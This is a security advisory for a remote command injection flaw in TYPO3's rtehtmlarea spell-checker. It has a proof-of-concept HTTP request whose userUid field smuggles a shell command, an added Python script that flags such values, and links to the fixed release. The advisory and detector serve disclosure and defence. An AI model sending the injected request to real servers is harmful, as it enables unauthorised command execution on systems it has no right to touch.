Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
BID:21680
Info
| Bugtraq ID: | 21680 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 20 2006 12:00AM |
| Updated: | Dec 20 2006 09:32PM |
| Credit: | D. Fabian and J. Greil are credited with the discovery of these issues. |
| Vulnerable: | Typo3 Typo3 4.0.3; Typo3 Typo3 4.0.2; Typo3 Typo3 4.0.1; Typo3 Typo3 3.7.0; Typo3 Typo3 4.0; Typo3 Typo3 3.8 |
| Not Vulnerable: | Typo3 Typo3 4.0.4 |
Discussion
TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. These issues occur because the application fails to properly sanitize user-supplied data.
Exploiting these issues allows unauthenticated attackers to execute arbitrary system commands with the privileges of the application.
Versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional 'rtehtmlarea' extension installed.
Exploit / POC
Attackers can exploit these issues via a web client.
The following proof-of-concept example is available:
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php?id=1 HTTP/1.1
Host: www.example.com
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+/tmp/shell.txt+%23&enablePersonalDicts=true
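For detection or request filtering on unpatched installations, the following added example (not part of the original advisory or of TYPO3) decodes a captured request to the spell-checker script and reports any userUid value that fails an allowlist. The allowlist pattern, the suffix match on the script path and the function and constant names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script named in the advisory's proof of concept; matched by suffix because
# the TYPO3 base path differs between installations.
SCRIPT_SUFFIX = "/SpellChecker/spell-check-logic.php"
# Parameter shown carrying the injected command in the proof of concept.
CHECKED_PARAMS = ("userUid",)
# Assumption: a legitimate user id is a short token of these characters only.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def inspect_request(raw):
    """Return (param, decoded_value) pairs that fail the allowlist."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return []
    target = urlsplit(parts[1])
    if not unquote(target.path).endswith(SCRIPT_SUFFIX):
        return []
    # Check the query string and the form body, since a handler may accept
    # either. separator="&" keeps a ';' inside the value instead of splitting.
    params = parse_qs(target.query, separator="&")
    for name, values in parse_qs(body.strip(), separator="&").items():
        params.setdefault(name, []).extend(values)
    return [(name, value)
            for name in CHECKED_PARAMS
            for value in params.get(name, [])
            if not SAFE_VALUE.fullmatch(value)]


# Request from the advisory's proof of concept, wrapped lines rejoined.
POC_REQUEST = (
    "POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/"
    "spell-check-logic.php?id=1 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+"
    "/tmp/shell.txt+%23&enablePersonalDicts=true"
)
# Constructed benign request to the same script.
BENIGN_REQUEST = POC_REQUEST.split("\r\n\r\n")[0] + "\r\n\r\ncmd=learn&userUid=42"

if __name__ == "__main__":
    for label, req in (("poc", POC_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(req))
```

The check validates the decoded value against what a user id may contain rather than searching for known shell metacharacters, so encoded or unusual separators are reported as well.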
Solution / Fix
Solution:
The vendor has released fixes to address these issues. Please see the references for more information.
Typo3 Typo3 3.8
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
Typo3 Typo3 4.0
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
Typo3 Typo3 3.7.0
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
Typo3 Typo3 4.0.1
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
Typo3 Typo3 4.0.2
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
Typo3 Typo3 4.0.3
- Typo3 typo3_src-4.0.4.tar.gz
  http://prdownloads.sourceforge.net/typo3/typo3_src-4.0.4.tar.gz?download
References
References:
- Synnefoims Homepage (synnefoims)
- Typo3 Command Execution Vulnerability (SEC Consult Research)